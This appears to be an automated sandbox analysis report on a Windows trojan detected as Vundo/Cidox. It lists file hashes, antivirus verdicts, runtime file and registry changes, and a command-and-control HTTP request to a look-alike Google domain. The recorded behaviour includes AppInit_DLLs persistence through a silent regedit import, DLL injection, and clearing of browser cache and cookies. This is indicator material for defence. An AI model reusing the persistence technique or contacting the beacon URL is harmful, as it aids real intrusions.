Analysis Date: 2015-01-17 15:02:54
MD5: a24296c7a915555965ff0f0b31d5de61
SHA1: ec6f9756634ae54910dadf11af6f9496d5e26574

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE: md5: 27968d52d43fe02a838adc5707db3948, sha1: 5cb63ab00e691466007ff7865e3d8a8b2b736561, size: 133120
Section DATA: md5: 2ce4f7ffebb7171e0539bde56bbde75d, sha1: df971512f9b9e78bb3870f8e0d41e108651cd0b7, size: 8192
Section BSS: md5: d41d8cd98f00b204e9800998ecf8427e, sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709, size: 0
Section .idata: md5: 2023cd19702acde992c16e1d649ba189, sha1: 863179311b64c35e6ff334a3ff22b607502d7a3b, size: 1536
Section .reloc: md5: 244d08a4778656d4908ffe859a3d590a, sha1: 999526cb7f944e127f7e5954e7469134d0e9ca09, size: 6656
Section .rsrc: md5: f5232a565223c214e120c5ed5bec877a, sha1: c1434e77752057db4f658a40e8334df8731ae7d6, size: 3584
Timestamp: 1992-06-19 22:22:17
PEhash: 7c685815054b0887b4c0c1294115e8eca434a865
IMPhash: db96365909b1f8da7ec3e3472777fb57
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.Vundo.GYW
AV Alwil (avast): Vundo-ACX [Trj]
AV Arcabit (arcavir): Trojan.Vundo.GYW
AV Authentium: W32/Vundo.JJFR-7586
AV Avira (antivir): TR/Drop.Vundo.V.815
AV BullGuard: Trojan.Vundo.GYW
AV CA (E-Trust Ino): Win32/Vundo.IBS
AV CAT (quickheal): Backdoor.Cidox.qkh.cw6
AV ClamAV: no_virus
AV Dr. Web: Trojan.LoadMoney.225
AV Emsisoft: Trojan.Vundo.GYW
AV Eset (nod32): Win32/Citirevo.AE
AV Fortinet: W32/Cidox.AE!tr
AV Frisk (f-prot): W32/Vundo.CY
AV F-Secure: Trojan.Vundo.GYW
AV Grisoft (avg): BackDoor.Generic16.YPM
AV Ikarus: Trojan-Downloader.Win32.Vundo
AV K7: Trojan ( 003f15571 )
AV Kaspersky: Backdoor.Win32.Cidox.qkh
AV MalwareBytes: Spyware.Zeus
AV Mcafee: Generic.oa
AV Microsoft Security Essentials: TrojanDropper:Win32/Vundo.AA
AV MicroWorld (escan): Trojan.Vundo.GYW
AV Rising: no_virus
AV Sophos: Troj/Mdrop-ETG
AV Symantec: Trojan.Gen.2
AV Trend Micro: TROJ_SPNR.2DAI13
AV VirusBlokAda (vba32): Backdoor.Cidox

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File: C:\WINDOWS\system32\tyabizk.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\tyabizk.dll\\x00

Network Details:

HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsegjfS0r5fn9B
User-Agent:
